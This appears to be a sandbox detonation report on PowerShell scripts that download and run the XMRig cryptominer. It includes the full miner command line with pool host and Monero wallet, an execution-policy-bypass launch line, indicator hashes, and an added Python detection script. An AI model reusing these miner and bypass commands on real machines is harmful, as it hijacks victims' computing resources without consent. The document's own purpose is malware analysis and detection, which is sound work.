C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
GB 161.35.34.195:443 rx.unmineable.com tcp
NL 52.111.243.30:443 tcp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0f12x4pg.2o1.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral29

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 06:14

Platform

win10v2004-20240508-en

Max time kernel

1790s

Max time network

1744s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 72.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.155:443 www.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 155.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 31.121.18.2.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 10.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yakfyvsk.1ls.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3


memory/3524-100-0x00007FF62D830000-0x00007FF62E463000-memory.dmp

memory/3524-101-0x00007FF62D830000-0x00007FF62E463000-memory.dmp

memory/3524-102-0x00007FF62D830000-0x00007FF62E463000-memory.dmp

memory/3524-103-0x00007FF62D830000-0x00007FF62E463000-memory.dmp

memory/3524-104-0x00007FF62D830000-0x00007FF62E463000-memory.dmp

memory/3524-105-0x00007FF62D830000-0x00007FF62E463000-memory.dmp

memory/3524-106-0x00007FF62D830000-0x00007FF62E463000-memory.dmp

memory/3524-107-0x00007FF62D830000-0x00007FF62E463000-memory.dmp

memory/3524-108-0x00007FF62D830000-0x00007FF62E463000-memory.dmp

memory/3524-109-0x00007FF62D830000-0x00007FF62E463000-memory.dmp

memory/3524-110-0x00007FF62D830000-0x00007FF62E463000-memory.dmp

memory/3524-111-0x00007FF62D830000-0x00007FF62E463000-memory.dmp

memory/3524-112-0x00007FF62D830000-0x00007FF62E463000-memory.dmp

memory/3524-113-0x00007FF62D830000-0x00007FF62E463000-memory.dmp

memory/3524-114-0x00007FF62D830000-0x00007FF62E463000-memory.dmp

memory/3524-115-0x00007FF62D830000-0x00007FF62E463000-memory.dmp

memory/3524-116-0x00007FF62D830000-0x00007FF62E463000-memory.dmp

memory/3524-117-0x00007FF62D830000-0x00007FF62E463000-memory.dmp

Analysis: behavioral14

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 05:55

Platform

win10-20240404-en

Max time kernel

1798s

Max time network

1782s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
(the sandbox repeats this empty row 64 times for this rule; no per-match detail was extracted)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 91.65.42.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp

Files

memory/4988-3-0x00007FF98AAA3000-0x00007FF98AAA4000-memory.dmp

memory/4988-5-0x000001ED76C30000-0x000001ED76C52000-memory.dmp

memory/4988-9-0x00007FF98AAA0000-0x00007FF98B48C000-memory.dmp

memory/4988-8-0x000001ED76F00000-0x000001ED76F76000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_l1qnq1y5.cb4.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4988-10-0x00007FF98AAA0000-0x00007FF98B48C000-memory.dmp

memory/4988-25-0x00007FF98AAA0000-0x00007FF98B48C000-memory.dmp

memory/4988-48-0x000001ED77080000-0x000001ED77092000-memory.dmp

memory/4988-61-0x000001ED767A0000-0x000001ED767AA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4788-90-0x0000020F038F0000-0x0000020F03910000-memory.dmp

memory/4788-91-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4988-93-0x00007FF98AAA3000-0x00007FF98AAA4000-memory.dmp

memory/4788-92-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4988-94-0x00007FF98AAA0000-0x00007FF98B48C000-memory.dmp

memory/4788-95-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-96-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-97-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-98-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-99-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-100-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-101-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-102-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-103-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-104-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-105-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-106-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-107-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-108-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-109-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-110-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-111-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-112-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-113-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-114-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-115-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-116-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-117-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-118-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-119-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-120-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-121-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-122-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-123-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-124-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-125-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-126-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-127-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-128-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-129-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-130-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-131-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-132-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-133-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-134-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-135-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-136-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-137-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-138-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-139-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-140-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-141-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-142-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-143-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-144-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-145-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-146-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-147-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-148-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-149-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-150-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-151-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-152-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-153-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-154-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-155-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp
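The behavioral14 artefacts above carry three things a responder wants to reuse: the xmrig command line under Processes (algorithm `rx`, TLS stratum pool `rx.unmineable.com:443`, an unmineable `COIN:address.worker` login), the PowerShell parent launched with `-ExecutionPolicy bypass -File`, and a `__PSScriptPolicyTest_*.ps1` entry under Files whose MD5/SHA1/SHA256/SHA512 are the hashes of the single byte `1`, which is the probe file PowerShell itself writes when it checks AppLocker/WDAC script enforcement, not attacker content. The `SeLockMemoryPrivilege` rows under Signatures are XMRig asking for large pages to back its RandomX dataset, a useful secondary trait but not one that is visible in process-creation telemetry. The example below is added here and is not part of the sandbox report or of the XMRig project: it parses the miner invocation into IOCs, scores Sysmon-style process-creation events (the field names `Image`, `CommandLine`, `ParentCommandLine` and the weights and threshold are assumptions for the example) on the traits seen in this detonation, and verifies the policy-test file hashes. All sample events are constructed; only the command lines, wallet and hashes are copied from the report.

```python
# Added example (not from the sandbox report or the XMRig project); see the lead-in above.
import hashlib
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple
from urllib.parse import urlsplit

# Values copied from the report's "Processes" and "Files" sections.
WALLET = "45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF"
XMRIG_CMDLINE = (r'"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx '
                 f"-o stratum+ssl://rx.unmineable.com:443 -u XMR:{WALLET}.unmineable_worker_vilqtiac -p x")
PS_CMDLINE = r'powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"'
REPORTED_POLICY_TEST_HASHES = {
    "md5": "c4ca4238a0b923820dcc509a6f75849b",
    "sha1": "356a192b7913b04c54574d18c28d46e6395428ab",
    "sha256": "6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b",
    "sha512": "4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a",
}

@dataclass
class MinerConfig:
    algo: Optional[str]
    pool_host: Optional[str]
    pool_port: Optional[int]
    tls: bool
    coin: Optional[str]      # unmineable prefixes the address with a coin ticker
    wallet: Optional[str]
    worker: Optional[str]

FLAGS = {"-a": "algo", "--algo": "algo", "-o": "url", "--url": "url", "-u": "user", "--user": "user"}

def tokenize(cmdline: str) -> List[str]:
    """Windows-style split: a double-quoted run is one token, quotes dropped."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]

def parse_xmrig_cmdline(cmdline: str) -> MinerConfig:
    """Pull pool and wallet IOCs out of an xmrig invocation (-o/-u/-a, long forms, --opt=value)."""
    toks, opts, i = tokenize(cmdline), {}, 1
    while i < len(toks):
        k, eq, v = toks[i].partition("=")
        if k in FLAGS:
            if not eq and i + 1 < len(toks):    # "-o value" form: value is the next token
                v, i = toks[i + 1], i + 1
            opts[FLAGS[k]] = v
        i += 1
    host = port = scheme = None
    if "url" in opts:
        p = urlsplit(opts["url"] if "://" in opts["url"] else "stratum+tcp://" + opts["url"])
        scheme, host, port = p.scheme, p.hostname, p.port
    user, coin = opts.get("user", ""), None
    if ":" in user.split(".", 1)[0]:          # COIN:address.worker (unmineable style)
        coin, _, user = user.partition(":")
    wallet, _, worker = user.partition(".")
    return MinerConfig(opts.get("algo"), host, port, scheme in ("stratum+ssl", "stratum+tls"),
                       coin, wallet or None, worker or None)

# Traits taken from this detonation; the weights and the threshold are example choices.
TRAITS = [  # (event field, pattern, weight, label)
    ("CommandLine", re.compile(r"\b(?:stratum\+(?:tcp|ssl|tls)|daemon\+https?)://", re.I), 40, "stratum_pool_url"),
    ("CommandLine", re.compile(r"\b4[1-9A-HJ-NP-Za-km-z]{94}\b"), 30, "monero_wallet"),   # 95-char XMR address
    ("Image", re.compile(r"\\AppData\\Local\\Temp\\", re.I), 15, "image_in_user_temp"),
    ("ParentCommandLine", re.compile(r"-ExecutionPolicy\s+bypass\b.*-File\b", re.I), 15, "parent_powershell_bypass"),
]

def score_process_event(evt: Dict[str, str]) -> Tuple[int, List[str]]:
    """Score one Sysmon-style process-creation event; returns (score, matched trait labels)."""
    hits = [(w, label) for field, rx, w, label in TRAITS if rx.search(evt.get(field, ""))]
    return sum(w for w, _ in hits), [label for _, label in hits]

def hunt(events: List[Dict[str, str]], threshold: int = 50) -> List[Tuple[int, int, List[str]]]:
    """(index, score, traits) for every event scoring at or above the threshold."""
    scored = [(i, *score_process_event(e)) for i, e in enumerate(events)]
    return [s for s in scored if s[1] >= threshold]

def policy_test_file_is_benign(reported: Dict[str, str]) -> bool:
    """PowerShell writes __PSScriptPolicyTest_<random>.ps1 holding the single byte "1" to probe
    AppLocker/WDAC script enforcement; matching hashes mean the file carries no attacker content."""
    return all(hashlib.new(alg, b"1").hexdigest() == h for alg, h in reported.items())

# Constructed sample telemetry: the miner launch from this report, a benign browser
# child, and a temp-dir installer spawned by a bypass-policy script (scores below threshold).
SAMPLE_EVENTS = [
    {"Image": r"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe",
     "CommandLine": XMRIG_CMDLINE, "ParentCommandLine": PS_CMDLINE},
    {"Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "CommandLine": "chrome.exe --type=renderer --lang=en", "ParentCommandLine": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Users\Admin\AppData\Local\Temp\setup.exe",
     "CommandLine": r'"C:\Users\Admin\AppData\Local\Temp\setup.exe" /S',
     "ParentCommandLine": r'powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\Downloads\install.ps1"'},
]

if __name__ == "__main__":
    print(parse_xmrig_cmdline(XMRIG_CMDLINE))
    print(hunt(SAMPLE_EVENTS))
    print("policy-test file benign:", policy_test_file_is_benign(REPORTED_POLICY_TEST_HASHES))
```

The third sample event is deliberately ambiguous (a dropped executable in the user's Temp directory under a bypass-policy PowerShell parent) and stays under the threshold; the pool URL and the wallet address are what separate a miner from an installer, and both come straight from the command line, so this logic needs no memory scan. The GitHub destinations in the Network table are consistent with the script fetching the xmrig-6.21.3 release archive before the pool connection; when blocking, block the pool host and the wallet string rather than GitHub.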

Analysis: behavioral30

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 06:17

Platform

win10-20240404-en

Max time kernel

1799s

Max time network

1794s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
(the sandbox repeats this empty row 64 times for this rule; no per-match detail was extracted)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 25.73.42.20.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp

Files

memory/516-3-0x00007FFFE8123000-0x00007FFFE8124000-memory.dmp

memory/516-5-0x0000029220730000-0x0000029220752000-memory.dmp

memory/516-8-0x00007FFFE8120000-0x00007FFFE8B0C000-memory.dmp

memory/516-9-0x00000292208E0000-0x0000029220956000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uxsjvzya.lba.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/516-10-0x00007FFFE8120000-0x00007FFFE8B0C000-memory.dmp

memory/516-25-0x00007FFFE8120000-0x00007FFFE8B0C000-memory.dmp

memory/516-48-0x0000029220A80000-0x0000029220A92000-memory.dmp

memory/516-61-0x0000029220A60000-0x0000029220A6A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4828-90-0x0000015A78570000-0x0000015A78590000-memory.dmp

memory/4828-91-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/516-93-0x00007FFFE8123000-0x00007FFFE8124000-memory.dmp

memory/4828-92-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/516-94-0x00007FFFE8120000-0x00007FFFE8B0C000-memory.dmp

memory/516-95-0x00007FFFE8120000-0x00007FFFE8B0C000-memory.dmp

memory/4828-96-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-97-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-98-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-99-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-100-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-101-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-102-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-103-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-104-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-105-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-106-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-107-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-108-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-109-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-110-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

